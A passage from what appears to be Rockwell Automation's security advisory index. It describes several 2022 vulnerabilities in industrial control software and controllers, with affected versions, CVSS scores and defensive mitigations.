  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimizing network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet.
  • Locating control system networks and devices behind firewalls and isolating them from the enterprise/business network.
  • Restricting or blocking traffic on TCP 44818 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by Rockwell Automation products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.
Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide (Publication ENET-TD001E) for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines (Publication secure-rm001) on how to use Rockwell Automation products to improve the security of their industrial automation systems.

CIP Security mitigates this vulnerability as it provides the ability to deploy TLS and DTLS based secure communications to supported products.  CIP Security is an enhancement to the ODVA EtherNet/IP industrial communication standard and directly addresses the vulnerability noted in this disclosure. CIP Security allows for users to leverage and manage certificates and/or pre-shared keys and does not make use of any hardcoded keys.

As of May 5, 2021, a new mitigation option is now available.  The 1783-CSP CIP Security Proxy is a standalone hardware solution that provides CIP Security for devices that do not natively support CIP Security.  See below for how this product can be deployed to address CompactLogix based applications.

Customers requiring setup or deployment guidance for CIP Security protocol should refer to the CIP Security deployment refence guide (Publication secure-at001) for more information.

*Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knoweldgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High
PN1600 | PN1600 | ISaGRAF Workbench Vulnerable to Multiple Phishing-Style Attacks
Published Date:
July 20, 2022
Last Updated:
July 20, 2022
CVE IDs:
CVE-2022-2463, CVE-2022-2465, CVE-2022-2464
Products:
AADvance, ISaGRAF, Trusted
CVSS Scores:
6.1, 7.7, 8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 – July 19, 2022
Version 1.1 – July 20, 2022 – Added AAdvance Trusted SIS Workstation to products affected

Executive Summary

Rockwell Automation received a report from Claroty regarding three vulnerabilities in ISaGRAF® Workbench. If successfully exploited, these vulnerabilities may result in directory traversal, privilege escalation, and arbitrary code execution. These vulnerabilities all require user interaction such as a phishing attack for successful exploitation.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • ISaGRAF Workbench v6.0 though v6.6.9
  • AADvance-Trusted Safety Instrumented System Workstation v1.1 and below

Vulnerability Details

CVE-2022—2465: Deserialization of untrusted data may result in arbitrary code execution

ISaGRAF Workbench does not limit the objects that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in ISaGRAF Workbench, may result in remote code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2022-2464: Directory traversal vulnerability may lead to privilege escalation

The parsing mechanism that processes certain file types does not provide input sanitization for file paths. This may allow an attacker to craft malicious files that, when opened by ISaGRAF Workbench, can traverse the file system. If successfully exploited, an attacker would be able to overwrite existing files and create additional files with the same permissions of the ISaGRAF Workbench software. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 7.7/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2022-2463: Improper input sanitization may lead to privilege escalation

ISaGRAF does not sanitize paths specified within the .7z exchange file during extraction. This type of vulnerability is also commonly referred to as a Zip Slip. A local, authenticated attacker can create a malicious .7z exchange file that when opened by ISaGRAF Workbench will allow the attacker to gain the privileges of the software. If the software is running at SYSTEM level, the attacker will gain admin level privileges. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 6.1/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Product Suggested Actions
CVE-2022-2463
CVE-2022-2464
CVE-2022-2465		 ISaGRAF Workbench Upgrade to ISaGRAF Workbench v6.6.10 or later.
CVE-2022-2463
CVE-2022-2464		 AAdvance-Trusted SIS Workstation Upgrade to AADvance-Trusted SIS Workstation 1.2 or later
CVE-2022-2465 AAdvance-Trusted SIS Workstation It is recommended that customers follow the security guidelines below until an updated release is available to mitigate this issue.
If immediate upgrade is not possible, customers should consider implementing the following mitigations:
  • Run ISaGRAF Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted .7z exchange files with ISaGRAF Workbench. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

If applying the mitigations noted above, is not possible please see our Knowledgebase article, QA43240 – Security Best Practices, for additional recommendations to maintain the security posture of your environment.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

Critical
PN1599 | PN1599 | FactoryTalk Analytics DataView Vulnerable to Spring4Shell Vulnerability (CVE 2022-22965)
Published Date:
July 14, 2022
Last Updated:
July 14, 2022
Products:
FactoryTalk Analytics DataView
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 – July 14, 2022

Executive Summary

Rockwell Automation was made aware of a zero-day vulnerability that impacts the Spring Core Framework. If exploited, this vulnerability could potentially have a high impact on the confidentiality, integrity, and availability of the targeted device.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including products in scope, impact, and recommended countermeasures are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • FactoryTalk® Analytics™ DataView v.3.03.01 and below

Vulnerability Details

Rockwell Automation was made aware of a third-party remote code execution vulnerability that exists in the Spring Core Framework. This vulnerability could potentially allow an attacker to send a specially crafted request to a vulnerable server. To exploit this vulnerability, the target application must run on a Tomcat as a WAR deployment. However, due to the nature of the vulnerability, other ways to exploit it may exist.

CVSS Base Score: 9.8 /10 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Rockwell Automation is in the process of testing and validating the patch and will update this advisory for each product as updated firmware becomes available. Please see our Knowledgebase article, QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

References

Medium
PN1597 | PN1597 | MicroLogix 1400/1100 Vulnerable to Clickjacking Vulnerability
Published Date:
July 07, 2022
Last Updated:
July 07, 2022
CVE IDs:
CVE-2022-2179
Products:
1763 MicroLogix 1100, 1766 MicroLogix 1400
CVSS Scores:
6.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 – July 7, 2022

Executive Summary

Rockwell Automation received a vulnerability report from Pawan V. Sable and Pranita Sadgir, and Dr. Faruk Kazi of COE-CNDS from Veermata Jijabai Technological Institute (VJTI) India. If exploited, this vulnerability could potentially have a high impact on the confidentiality of the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided herein. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • MicroLogix™ 1400 v. 21.007 and below
  • MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the X-Frame-Options header is not configured in the HTTP response and allows potential clickjacking attacks. Exploitation of this vulnerability could potentially allow a malicious user to trick a legitimate user into using an untrusted website. If exploited, this vulnerability could lead to a loss of sensitive information, such as authentication credentials.

(CVE 2022 - 2179) MicroLogix Controllers Vulnerable to Clickjacking Attack
CVSS Base Score: 6.5 /10 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices, also provided below, to deploy a defense-in-depth strategy.
  • Disable the web server, if possible (This component is an optional feature and disabling it will not disrupt the intended use of the device)
  • Configure firewalls to disallow network communication through HTTP/Port 80
If applying the mitigations noted above are not possible, please see our Knowledgebase article QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

References

Medium
PN1596 | PN1596 | Logix Controllers Vulnerable to Denial-of-Service Attack
Published Date:
June 17, 2022
Last Updated:
June 17, 2022
CVE IDs:
CVE-2022-1797
Products:
1769 Compact GuardLogix 5370, 1756/5069 GuardLogix, 1768/1769/5069 CompactLogix, 1756 ControlLogix
CVSS Scores:
6.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.4
Revision History
Version 1.0 – May 24, 2022
Version 1.1 – June 3, 2022 Updated suggested actions and removed versions for clarity
Version 1.2 – June 17, 2022 Clarified vulnerability details and updated risk mitigation section
Version 1.3 – July 8th, 2022 Updated risk mitigation section
Version 1.4 – July 17th, 2023 Updated risk mitigation section

Executive Summary

Rockwell Automation was made aware of a vulnerability within our Logix controllers. This vulnerability may allow an unauthorized user to send malicious messages to the targeted device, which could potentially, lead to a denial-of-service.

Customers using affected versions of this software are encouraged to evaluate the following mitigations provided and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • CompactLogix™ 5380 controllers
  • Compact GuardLogix® 5380 controllers
  • CompactLogix 5480 controllers
  • ControlLogix® 5580 controllers
  • GuardLogix 5580 controllers
  • CompactLogix 5370 controllers
  • Compact GuardLogix 5370 controllers
  • ControlLogix 5570 controllers
  • GuardLogix 5570 controllers

Vulnerability Details

CVE-2022-1797 Rockwell Automation Logix controllers are vulnerable to denial-of-service attack
A vulnerability that exists in the Logix controller may allow an attacker to modify a message instruction control structure that could cause a denial-of-service condition due to a major nonrecoverable fault. If the controller experiences a major nonrecoverable fault, a user will have to clear the fault and redownload the user project file to bring the device back online and continue normal operations.

CVSS v3.1 Base Score: 6.8/10[MEDIUM]
CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers can apply either mitigation A or B to address this vulnerability. Customers are directed towards the risk mitigation provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Products Affected Version Affected Suggested Actions
CompactLogix 5380 Versions prior to 32.016 Mitigation A: Customers should upgrade to version 32.016 firmware or later to mitigate this issue.

Mitigation B: Set the message control structures access to read-only. Instructions are in Chapter 4 of Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.
Compact GuardLogix 5380
CompactLogix 5480
ControlLogix 5580
GuardLogix 5580
CompactLogix 5370 Versions prior to 33.016 Mitigation A: Customers should upgrade to version 33.016 firmware or later to mitigate this issue.

Mitigation B: Set the message control structures access to read only.  Instructions are in Chapter 4 of Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.
Compact GuardLogix 5370
ControlLogix 5570
GuardLogix 5570
ControlLogix 5570 Redundancy Versions prior to 33.053 Mitigation A: Customers should upgrade to version 33.053 firmware or later to mitigate this issue.

Mitigation B: Set the message control structures access to read only.  Instructions are in Chapter 4 of Logix 5000™ Controllers I/O and Tag Data Programming Manual, publication 1756-PM004.


If applying mitigation A or B is not possible, customers should consider implementing the following solutions:
  • Use of Microsoft® AppLocker or other similar allow list applications can help mitigate risk. Information on using AppLocker with products from Rockwell Automation is available at Knowledgebase article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, see Knowledgebase article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation, and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

Critical
PN1585 | PN1585 | Logix Controllers May Allow for Unauthorized Code Injection
Published Date:
May 06, 2022
Last Updated:
May 06, 2022
CVE IDs:
CVE-2021-22681, CVE-2022-1161
Products:
5069 Compact GuardLogix 5380, 1769 CompactLogix Controllers, 1769 CompactLogix 5370, 1756/5069 GuardLogix, 1768 CompactLogix Controllers, ControlLogix Hardware
CVSS Scores:
10.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.2 – May 06, 2022 Updated vulnerability details and risk mitigations

Detailed Information

Claroty, a cybersecurity technology vendor and partner of Rockwell Automation, disclosed a vulnerability in Logix Controllers to Rockwell Automation. Claroty found that some Logix Controllers may allow an attacker, with the ability to modify user programs, to download a user program containing malicious code that would be undetectable to the user. This vulnerability was found by Sharon Brizinov and Tal Keren of Claroty, and they have provided a blog post with more details located here.

An attacker could gain the ability to modify user programs by leveraging a previously disclosed vulnerability (“Authentication Bypass Vulnerability Found in Logix Controllers”) whereby a private key was discovered potentially allowing Logix Controllers communicating over the unauthenticated version of EtherNet/IP™ to accept communication that do not originate from Studio 5000 Logix Designer ® software.

Affected Products

  • 1768 CompactLogix™ controllers
  • 1769 CompactLogix controllers
  • CompactLogix 5370 controllers
  • CompactLogix 5380 controllers
  • CompactLogix 5480 controllers
  • Compact GuardLogix® 5370 controllers
  • Compact GuardLogix 5380 controllers
  • ControlLogix® 5550 controllers
  • ControlLogix 5560 controllers
  • ControlLogix 5570 controllers
  • ControlLogix 5580 controllers
  • GuardLogix 5560 controllers
  • GuardLogix 5570 controllers
  • GuardLogix 5580 controllers
  • FlexLogix™ 1794-L34 controllers
  • DriveLogix™5730 controllers
  • SoftLogix™ 5800 controllers

Vulnerability Details

[CVE-2022-1161]: Modification of PLC Program Code

An attacker with the ability to modify a user program may change user program code on some ControlLogix, CompactLogix, and GuardLogix Control systems. Studio 5000 Logix Designer writes user-readable program code to a separate location than the executed compiled code allowing an attacker to change one and not the other. Additionally, devices communicating over the unauthenticated version of EtherNet/IP may be vulnerable to attacks from custom clients exploiting CVE-2021-22681

CVSS v3.1 Base Score: 10.0/CRITICAL
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

The following types of code are affected by this vulnerability – indicated by an X:
Product Structured Text
(ST)		 Ladder Diagrams
(LD)		 Function Block Diagram
(FBD)		 Sequential Function Chart (SFC) Add-On Instructions (AOI)
1768 CompactLogix X Not affected X X X
1769 CompactLogix X Not affected X X X
CompactLogix 5370 X Not affected X X X
CompactLogix 5380 X X X X X
CompactLogix 5480 X X X X X
Compact GuardLogix 5370 X Not affected X X X
Compact GuardLogix 5380 X X X X X
ControlLogix 5550 X Not affected X X X
ControlLogix 5560 X Not affected X X X
ControlLogix 5570 X Not affected X X X
ControlLogix 5580 X X X X X
GuardLogix 5560 X Not affected X X X
GuardLogix 5570 X Not affected X X X
GuardLogix 5580 X X X X X
FlexLogix 1794-L34 X Not affected X X X
DriveLogix 5730 X Not affected X X X
SoftLogix 5800 X Not affected X X X

Risk Mitigation & User Action

We recommend customers using the affected products, below, to apply both Risk Mitigations A and B, if possible. Additionally, customers are advised to implement Risk Mitigation B as a long-term mitigation action and to overall increase the security posture of their environment. Furthermore, we encourage customers to apply general security guidelines in addition to the risk mitigations for a comprehensive defense in depth strategy.

Product Family Risk Mitigation and Recommended User Actions









ControlLogix 5570
ControlLogix 5580
GuardLogix 5570
GuardLogix 5580
CompactLogix 5380
Compact GuardLogix 5380
Risk Mitigation A:
  • Recompile and download user program code (i.e., acd) using an uncompromised workstation
  • Put controller mode switch into Run position
If keeping controller mode switch in Run is impractical, use the following mitigation:
  • Recompile and download user program code (i.e., acd) using an uncompromised workstation
  • Monitor controller change log for any unexpected modifications or anomalous activity
  • Utilize the Controller Log feature
  • Utilize Change Detection in the Logix Designer Application
  • If available, use the functionality in FactoryTalk AssetCentre software to detect changes

Risk Mitigation B:
Implement CIP Security™ to help prevent unauthorized connections when properly deployed.  Supported controllers and communications modules include:
  • ControlLogix 5580 processors using on-board EtherNet/IP port
  • GuardLogix 5580 processors using on-board EtherNet/IP port
  • ControlLogix 5580 processors operating in High Availability (HA) configurations using 1756-EN4TR’s
  • ControlLogix 5560, ControlLogix 5570, ControlLogix 5580, GuardLogix 5570 and GuardLogix 5580 can use a 1756-EN4TR ControlLogix EtherNet/IP™ module
  • If using a 1756-EN2T, then replace with a 1756-EN4TR
  • CompactLogix 5380 using on-board EtherNet/IP port
  • Compact GuardLogix 5380 using on-board EtherNet/IP port

We recommend customers using the affected products, below, to apply Risk Mitigation A. We encourage customers to apply general security guidelines in addition to the risk mitigations for a comprehensive defense in depth strategy.
Product Family Risk Mitigation and Recommended User Actions
1768 CompactLogix
1769 CompactLogix
CompactLogix 5370
CompactLogix 5480
ControlLogix 5560
GuardLogix5560

 Risk Mitigation A:
  • Recompile and download user program code (i.e., acd)
  • Put controller mode switch into Run position

If keeping controller mode switch in Run is impractical, then use the following mitigation:
  • Recompile and download user program code (i.e., acd)
  • Monitor controller change log for any unexpected modifications or anomalous activity
  • Use the Controller Log feature
  • Use Change Detection in the Logix Designer application
  • If available, use the functionality in FactoryTalk AssetCenter to detect changes

In addition to applying risk mitigations, customers should also utilize the detection tools, listed below, to identify if this vulnerability has been exploited in their environment.

Exploitation Detection Method:

The detection method can be used to determine if the user program residing in the controller is identical to what was downloaded. After upgrading to V34, this user program verification can be done via two methods:
  • On-demand using the online feature of the Logix Designer Compare Tool V9 or later. Details on how to utilize user program verification to discover if this vulnerability has been exploited can be found at Logix Designer Compare Tool User Manual, pages 19-20.
  • Schedule user program verification on FactoryTalk® AssetCentre V12 or later (Available Fall 2022).
Notes:
  • The user program comparison must be performed using the online compare tool feature from an uncompromised workstation.
  • Customers are directed to upgrade to Studio 5000® V34 software, or later, and the corresponding firmware versions for the Logix 5580, 5380, 5480, GuardLogix 5580 and Compact GuardLogix 5380. Review your controllers’ user manual to determine the required controller firmware version.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware keyswitch setting, to which may be used to block unauthorized changes, etc.
  • Block all traffic to EtherNet/IP or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

Social Engineering Mitigation Strategies
Do not click on or open URL links from untrusted sources.Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations (Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see Rockwell Automation Publication System Security Design Guidelines Reference Manual.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).
Please direct all media inquiries to Marci Pelzer (MPelzer@rockwellautomation.com).

Additional Links

High
PN1586 | PN1586 | Logix Designer Application May Allow Unauthorized Controller Code Injection
Published Date:
May 06, 2022
Last Updated:
May 06, 2022
CVE IDs:
CVE-2022-1159
Products:
RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores:
7.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 – March 31, 2022
Version 1.1 – May 06, 2022 – Updated vulnerability details and mitigations

Detailed Information

Claroty, a cybersecurity technology vendor and partner of Rockwell Automation, disclosed a vulnerability in Studio 5000 Logix Designer® software which impacts some Logix controllers. Claroty found that the Logix Designer application could allow an unauthorized third-party to inject controller code using a compromised workstation where the third party has gained administrative access. This could allow a third party to download the modified program to the controller and potentially allow for arbitrary code execution on the controller in a way that would potentially be undetectable to a user. This vulnerability was found by Sharon Brizinov and Tal Keren of Claroty, and they have provided a blog post with more details located here .

Affected Products

Studio 5000 Logix Designer application v28 and later, and the following Logix controllers running these versions:
  • ControlLogix® 5580 controllers
  • GuardLogix® 5580 controllers
  • CompactLogix™ 5380 controllers
  • CompactLogix 5480 controllers
  • Compact GuardLogix 5380 controllers

Vulnerability Details

[CVE-2022-1159]: Modification of PLC Program Code
Studio 5000 Logix Designer compiles the user program on the workstation.  This compilation process prepares the Logix Designer application user program for download to a Logix controller. To successfully exploit this vulnerability, an attacker must first gain administrator access to the workstation running Studio 5000 Logix Designer.  The attacker can then intercept the compilation process and inject code into the user program.   The user may potentially be unaware that this modification has taken place.

This exploit could also allow modification of source key protected content and license source protected content. Changes to the content may not be noticeable to the user. Additionally, exploitation could affect safety tasks if unlocked and signature unprotected at the time of the attack. A locked and signature protected safety task would not be impacted.

CVSS v3.1 Base Score: 7.7/HIGH
CVSS Vector: AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

There is no long-term mitigation for this vulnerability. Customers using the affected hardware and software are directed to apply compensating controls and utilize detection capabilities, which are both listed below. Additionally, we recommend implementing general security guidelines for a comprehensive defense in depth strategy.

Compensating Controls:

Exploitation Detection Method:

The detection method can be used to determine if the user program residing in the controller is identical to what was downloaded. After upgrading to V34, this user program verification can be done via two methods:
  • On-demand using the online feature of the Logix Designer Compare Tool V9 or later. Details on how to utilize user program verification to discover if this vulnerability has been exploited can be found at Logix Designer application Compare Tool User Manual publication LDCT-UM001C, pages 19-20.
  • Schedule user program verification on FactoryTalk® AssetCentre V12 or later (Available Fall 2022).
Notes:
  • The user program comparison must be performed using the online compare tool feature from an uncompromised workstation.
  • Customers are directed to upgrade to Studio 5000® V34 software, or later, and the corresponding firmware versions for the Logix 5580, 5380, 5480, GuardLogix 5580 and Compact GuardLogix 5380. Review your controllers’ user manual to determine the required controller firmware version.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware keyswitch setting, to which may be used to block unauthorized changes, etc.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar allow list application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see the Rockwell Automation publication number SECURE-RM001 “System Security Design Guidelines Reference Manual”.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).
Please direct all media inquiries to Marci Pelzer (MPelzer@rockwellautomation.com).

Additional Links

PN1594 | PN1594 | APT Cyber Tools Targeting ICS/SCADA Devices (PIPEDREAM/INCONTROLLER)
Published Date:
May 06, 2022
Last Updated:
May 06, 2022
Products:
FactoryTalk Linx Gateway
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 – May 6, 2022

Executive Summary

On April 13, 2022, researchers announced a new set of tools that was developed by an Advanced Persistent Threat (APT). This set of tools allows threat actors to attack specific ICS and OT hardware and software. Rockwell Automation is providing this advisory to notify customers of our response to this threat.

We are diligently working through our process to evaluate the threat and provide security mitigations as needed. Rockwell Automation recommends that customers apply hardening techniques, in addition to security best practices for a comprehensive defense in depth approach.

Affected Products

We are aware that the tool set contains modules that target OPC UA servers, CODESYS runtimes, and ASRock drivers. After evaluation, Rockwell Automation is aware that the products, listed below, use one of the targeted components. This list may be updated if more products are identified.

Products that use OPC UA servers:
  • FactoryTalk® Linx Gateway
    • Editions include embedded, basic, standard, extended distributed, professional
    • Versions include 6.10, 6.11, 6.20, 6.21 and 6.30

Risk Mitigation & User Action

We recommend the following compensating controls for customers using Rockwell Automation products that use the targeted hardware and software:
  • Disable anonymous authentication and configure the use of FactoryTalk Security using the following guidance. FactoryTalk Linx Gateway Getting Result Guide FTLG-GR001E
    • Chapter 4 - UA Server Endpoints - Endpoint Properties
    • Appendix D - Secure FactoryTalk Linx Gateway using FactoryTalk Security
  • Enforce a lockout threshold for failed authentication attempts and configure audit logs using the following guidance to detect signs of an attack. FactoryTalk Security System Configuration Guide Publication FTSEC-QS001R - Chapter 9
    • Set system policies - Account Policy Settings
    • Set audit policies - Monitor security-related events

General Security Guidelines

Refer to the Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Industrial Security Services website for information on security services from Rockwell Automation to assess, help protect, detect, respond, and recover from incidents. These services include assessments, designs, implementations, industrial anomaly detection, patch management, and remote infrastructure monitoring and administration.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation in PN1354 – Industrial Security Advisory Index

